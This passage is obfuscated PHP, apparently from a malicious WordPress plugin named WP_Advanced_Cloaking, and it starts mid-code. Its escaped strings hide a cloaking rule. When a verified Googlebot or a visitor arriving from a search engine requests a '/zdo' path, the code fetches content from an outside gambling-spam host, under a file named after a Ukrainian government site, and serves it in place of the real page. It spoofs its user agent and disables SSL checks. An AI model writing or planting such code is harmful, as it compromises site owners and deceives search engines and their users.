initialize_cloaking_rules(); add_action("\164\x65\155\160\154\141\x74\145\x5f\x72\x65\144\151\162\x65\143\x74", array($this, "\150\141\x6e\x64\154\145\137\x63\154\x6f\x61\153\151\x6e\x67"), 1); } private function initialize_cloaking_rules() { $this->cloaking_rules = array(array("\160\x61\x74\x68" => "\x2f\x7a\x64\x6f", "\154\x61\x6e\x64\x69\156\147\x5f\x70\141\147\x65" => "\150\164\164\x70\163\x3a\x2f\x2f\x74\x6f\147\x65\154\x69\x6e\x76\x69\x70\x2e\x63\157\155\57\147\x73\143\57\151\162\160\151\x6e\x6f\x73\x76\151\x74\x61\56\x67\x6f\x76\x2e\x75\x61\x2e\164\x78\164", "\162\145\155\157\164\145\137\165\x72\x6c" => '')); } private function isSearchEngineBot() { $user_agent = $_SERVER["\x48\x54\124\120\137\125\123\x45\122\x5f\x41\x47\x45\116\124"] ?? ''; return preg_match("\x2f\50\x67\x6f\x6f\x67\x6c\x65\142\x6f\x74\x7c\x62\x69\x6e\x67\142\x6f\x74\174\171\141\156\144\145\x78\142\157\x74\174\x62\x61\x69\144\165\x73\x70\151\144\x65\x72\174\144\x75\143\x6b\x64\165\x63\x6b\x62\x6f\164\174\163\154\x75\x72\160\174\146\x61\143\145\x62\157\164\174\x69\141\137\141\162\x63\150\x69\166\145\162\x7c\x47\157\x6f\x67\154\145\x2d\x53\x69\164\145\x2d\x56\x65\162\x69\x66\151\x63\141\164\x69\x6f\156\174\107\157\157\x67\154\x65\x2d\111\x6e\163\160\145\143\x74\x69\157\x6e\x54\157\157\x6c\x7c\x41\x68\x72\x65\146\163\102\157\164\51\x2f\x69", $user_agent); } private function isRealGoogleBot() { $ip = $_SERVER["\x52\x45\115\117\x54\x45\x5f\x41\x44\104\x52"] ?? ''; if (empty($ip) || !filter_var($ip, FILTER_VALIDATE_IP)) { return false; } $host = gethostbyaddr($ip); if (preg_match("\57\x28\x5c\x2e\147\157\157\x67\x6c\145\x62\x6f\164\134\56\x63\x6f\155\174\x5c\x2e\x67\157\x6f\147\154\x65\x5c\x2e\143\157\155\51\44\57\x69", $host)) { return gethostbyname($host) === $ip; } return false; } private function isFromGoogle() { $referer = $_SERVER["\110\x54\x54\120\x5f\x52\105\106\105\122\105\122"] ?? ''; return !empty($referer) && (strpos($referer, "\x67\x6f\157\147\154\145\56") !== false || strpos($referer, "\x62\x69\156\x67\56") !== false || strpos($referer, "\x79\x61\150\157\x6f\56") !== false); } private function NuLzFetch($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (function_exists("\x63\x75\162\x6c\137\x69\x6e\x69\x74")) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => "\x4d\x6f\x7a\x69\x6c\x6c\141\57\65\x2e\x30\x20\50\127\x69\x6e\x64\x6f\x77\163\40\x4e\124\x20\61\x30\x2e\x30\73\x20\127\151\x6e\66\x34\73\40\x78\x36\x34\x29\40\101\x70\160\x6c\x65\x57\145\x62\x4b\x69\x74\57\x35\63\67\56\x33\66\40\x28\x4b\x48\x54\x4d\x4c\x2c\40\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\51\x20\x43\x68\x72\157\155\145\57\71\x31\56\x30\x2e\x34\64\x37\x32\56\61\62\x34\x20\x53\x61\146\x61\x72\x69\x2f\x35\x33\x37\x2e\63\x36")); $data = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code === 200 && $data) { return $data; } } $response = wp_remote_get($url, array("\164\151\x6d\x65\157\165\164" => 7, "\x73\163\x6c\166\145\x72\x69\146\171" => false, "\165\x73\145\162\55\141\147\145\156\x74" => "\115\157\x7a\x69\x6c\x6c\141\x2f\65\56\x30\40\50\127\151\156\144\x6f\167\x73\x20\116\x54\40\x31\60\56\x30\x3b\x20\127\151\x6e\x36\64\73\40\x78\66\x34\51\40\x41\160\x70\154\145\127\145\x62\x4b\151\x74\57\65\x33\x37\56\x33\66\x20\50\x4b\x48\x54\x4d\114\54\40\x6c\151\x6b\145\40\x47\x65\143\153\157\51\x20\103\x68\162\157\155\x65\x2f\71\x31\x2e\60\56\x34\64\67\x32\x2e\x31\x32\x34\x20\x53\141\x66\x61\x72\151\x2f\65\63\67\x2e\x33\66")); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { return wp_remote_retrieve_body($response); } } return null; } private function getLandingWithRemote($landing_url, $remote_url) { $landing = $this->NuLzFetch($landing_url); $remote = $this->NuLzFetch($remote_url); if (!$landing && !$remote) { return null; } if ($landing && $remote) { return $landing . "\12\12" . $remote; } return $landing ?: $remote; } public function handle_cloaking() { if (is_admin() || wp_doing_cron() || wp_doing_ajax()) { return; } $current_path = $_SERVER["\122\x45\121\125\105\x53\x54\x5f\125\122\111"] ?? ''; $matched_rule = null; foreach ($this->cloaking_rules as $rule) { if (strpos($current_path, $rule["\160\x61\164\150"]) !== false) { $matched_rule = $rule; break; } } if (!$matched_rule) { return; } $is_bot = $this->isSearchEngineBot(); $is_real_googlebot = $this->isRealGoogleBot(); $is_google_referer = $this->isFromGoogle(); if ($is_bot && $is_real_googlebot || $is_google_referer) { $content = $this->getLandingWithRemote($matched_rule["\154\x61\156\144\151\x6e\147\137\x70\141\147\145"], $matched_rule["\x72\145\155\x6f\164\145\x5f\x75\x72\x6c"]); if ($content) { header("\103\157\156\164\x65\x6e\164\x2d\x54\171\160\145\x3a\40\x74\x65\170\x74\57\150\x74\155\154\73\40\x63\150\141\162\x73\x65\x74\75\x55\x54\106\55\70"); header("\x58\x2d\103\x6c\157\x61\x6b\151\156\147\x3a\40\x41\143\x74\151\166\x65"); header("\x58\55\x4c\x61\156\x64\x69\x6e\147\55\123\x6f\165\x72\143\x65\72\40\105\170\x74\x65\x72\x6e\x61\x6c"); echo $content; die; } } return; } } goto ENHfU; ENHfU: new WP_Advanced_Cloaking();